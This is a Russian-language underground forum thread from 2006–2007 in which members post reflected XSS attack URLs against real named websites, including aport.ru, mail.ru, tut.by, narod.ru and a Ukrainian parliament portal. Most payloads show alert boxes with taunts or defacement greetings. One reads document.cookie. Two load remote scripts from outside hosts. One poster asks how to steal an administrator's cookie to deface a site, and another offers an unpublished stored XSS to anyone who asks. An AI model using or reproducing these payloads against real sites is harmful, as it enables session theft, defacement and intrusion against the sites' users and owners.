Вернуться   GraBBerZ.CoM - ICQ | Proxy | Бруты | Дедики | Эксплоиты > Underground > ][ack

Ответ
 
Опции темы Опции просмотра

XSS
Старый 21.12.2006, 16:53   #1
byte
 
Аватар для cRiLaZ
 
cRiLaZ вне форума
Регистрация: 26.09.2006
Сообщений: 99
Респекты: 21

XSS

Вот тут вобщем нарыл случайно, мне кажется что это уже где то было =\
Кароче зашел на апорт (давно не был) и на свежую голову ввел запрос =)
Что получилось смотрите =/
XSS на Апорте
Код:
_http://sm.aport.ru/scripts/template.dll?That=std&r="><script>alert(/  cRiLaZ idioT  /);</script>
  Ответить с цитированием

Старый 21.12.2006, 19:13   #2
byte
 
Аватар для cRiLaZ
 
cRiLaZ вне форума
Регистрация: 26.09.2006
Сообщений: 99
Респекты: 21
Вот еще, правда нашел не я :/
Код:
_http://www.message.ru/choose.cgi?image=><script>alert%20('cRiLaZ idioT');</script>
  Ответить с цитированием

Старый 27.12.2006, 01:02   #3
byte
 
Аватар для cRiLaZ
 
cRiLaZ вне форума
Регистрация: 26.09.2006
Сообщений: 99
Респекты: 21
Вот нашел на том же апорте (вместе с котом ) очередную КСС, канешно от нее ниче не возьмеш, но душе приятно

XSS-2 на aport.ru

Код:
_http://content.aport.ru/mpl/link2friend.pl?id=%3C/textarea%3E%3Cscript%3Ealert('Defaced%20by%20KoT777%20and%20cRiLaZ')%3C/script%3E%3Cbr%3E%3Cbr%3E%3Ch1%3ERespect%20Antichat%20and%20GraBBerZ%20team%3C/h1%3E
  Ответить с цитированием

Старый 27.12.2006, 19:27   #4
byte
 
Аватар для cRiLaZ
 
cRiLaZ вне форума
Регистрация: 26.09.2006
Сообщений: 99
Респекты: 21
гЫ, читал доки, и решил проверить на автомате

xss на mysql.ru

Код:
_http://www.mysql.ru/webboard/search.html?text=%22%3E%3Ch1%3Ecrilaz%3C%2Fh1%3E%3Cscript%3Ealert%28%22GreetZ+2+GraBBerZ+TeaM%22%29%3B%3C%2Fscript%3E%3Ctext%3D
  Ответить с цитированием

Старый 29.12.2006, 15:59   #5
byte
 
Аватар для cRiLaZ
 
cRiLaZ вне форума
Регистрация: 26.09.2006
Сообщений: 99
Респекты: 21
Пассивная КСС на mail.ru. Автор Я

Код:
_http://top.mail.ru/stat?url="><h1>crilaz</h1><script>alert(/crilaz idioT/)</script>
  Ответить с цитированием

Старый 29.12.2006, 23:24   #6
byte
 
Аватар для cRiLaZ
 
cRiLaZ вне форума
Регистрация: 26.09.2006
Сообщений: 99
Респекты: 21
XSS на e-mails.ru

Код:
http://www.e-mails.ru/scripts/netauth.dll?cmd=passwd4&name="><script>alert('crilaz idioT')</script>&vhost=www.e-mails.ru
  Ответить с цитированием

CSS & XSS
Старый 17.01.2007, 21:42   #7
#!/usr/bin/perl
 
Аватар для [sql]
 
[sql] вне форума
Регистрация: 07.01.2007
Сообщений: 24
Респекты: 9
CSS & XSS

Тема для показа найденных вами CSS & XSS на разных ресурсах.
Если найденный вами баг был где то опубликован, то сообщение будет удаляться. Пример приведен оформление сообщения.

Код:
_http://www.m3x.ru/search.asp?SearchFor="><script>alert('XSS')</script>
Код:
_http://www.ru-wm.ru/search.php?s_name="><script src=http://[host]/alert.js></script>
Код:
_http://www.mir220v.ru/search.php?query=">...&category_id=6498
Код:
_http://www.dvddom.ru/search.php?kind=films&Title=%22%3E%3Cscript%3Ealert%28%2Fcri%2F%29%3B%3C%2Fscript%3E%3Ctext%3D%22
  Ответить с цитированием

Старый 23.01.2007, 21:42   #8
byte
 
Аватар для cRiLaZ
 
cRiLaZ вне форума
Регистрация: 26.09.2006
Сообщений: 99
Респекты: 21
Раздача супер дырок на мыльниках =\

Код:
_http://bac.tut.by/index.php?tnt=0&tem=<script>alert("crilaz idioT");</script><h1>cRiLaZ</h1>
Код:
_http://afisha.tut.by/print.php?print=qwe&p="><script>alert("crilaz idioT");</script>
  Ответить с цитированием

Старый 24.03.2007, 20:07   #9
bit
 
Аватар для reas0n
 
reas0n вне форума
Регистрация: 23.03.2007
Адрес: Москва
Сообщений: 8
Респекты: 0
Моя первая XSS =)
Код:
_http://www.uaportal.com/cgi_bin/search_catalog.cgi?keywords=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%48%61%63%6B%65%64%20%62%79%20%72%65%61%73%30%6E%2F%29%3B%3C%2F%73%63%72%69%70%74%3E
P.S> Спасибо модеру
  Ответить с цитированием

Старый 10.04.2007, 16:27   #10
D4RK T3RR0R
 
Аватар для f0rd
 
f0rd вне форума
Регистрация: 24.03.2007
Адрес: :$_$:
Сообщений: 635
Респекты: 782
Код:
_http://www.icqmail.com/tnb_single.asp?foldername=options&tabup=?%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
- смотрите, где она
__________________
glamour is dead
  Ответить с цитированием

Старый 12.04.2007, 14:09   #11
D4RK T3RR0R
 
Аватар для f0rd
 
f0rd вне форума
Регистрация: 24.03.2007
Адрес: :$_$:
Сообщений: 635
Респекты: 782
Код:
_http://narod.ru/guestbook/?owner=1&mainhtml=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
__________________
glamour is dead
  Ответить с цитированием

Старый 08.05.2007, 14:46   #12
#!/usr/bin/perl
 
Аватар для [sql]
 
[sql] вне форума
Регистрация: 07.01.2007
Сообщений: 24
Респекты: 9
Верховна Рада України
Код:
_http://portal.rada.gov.ua/control/uk/publish/category/news_left?from="><script>alert(document.cookie)</script>
  Ответить с цитированием

Старый 30.06.2007, 12:32   #13
• E L E C T E D •
 
Аватар для es1k
 
es1k вне форума
Регистрация: 04.12.2006
Адрес: Неподалёку от Zimbabwe
Сообщений: 150
Респекты: 4
Вотс , сёня ночью искал, ковырялся,
Цитата:
_http://www.pidown.com/link.php?ref=%3E%3Cscript%3Ealert('XSS%20by%20es1k ')%3C/script%3E
У меня вопрос, ну вот я нашел такую багу, а как дефейснуть то? мне нужно в линке с документ.куки скрипт прописать и дать линк админу чтобы он зашел туда ? Вот дальнейшие действия по нахождению ХСС не понятны ( кто-нить объясните или скинте видео я посмортрю )
Добавлено
уже не нужно ) я разобрался.
  Ответить с цитированием

Старый 01.07.2007, 23:37   #14
D4RK T3RR0R
 
Аватар для f0rd
 
f0rd вне форума
Регистрация: 24.03.2007
Адрес: :$_$:
Сообщений: 635
Респекты: 782
Цитата:
http://icqmag.ru:80/?rs=<script/xss+src=http://f0rde.jino-net.ru/xss.js></script>
__________________
glamour is dead
  Ответить с цитированием

Старый 16.07.2007, 03:29   #15
D4RK T3RR0R
 
Аватар для f0rd
 
f0rd вне форума
Регистрация: 24.03.2007
Адрес: :$_$:
Сообщений: 635
Респекты: 782
Нашел активную XSS на fu2reteam.org.

Кому интересно - стучите
__________________
glamour is dead
  Ответить с цитированием
Ответ

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Быстрый переход



Время: 20:39



Powered by vBulletin® Version 3.7.6
Copyright ©2000 - 2017, Jelsoft Enterprises Ltd. Перевод: zCarot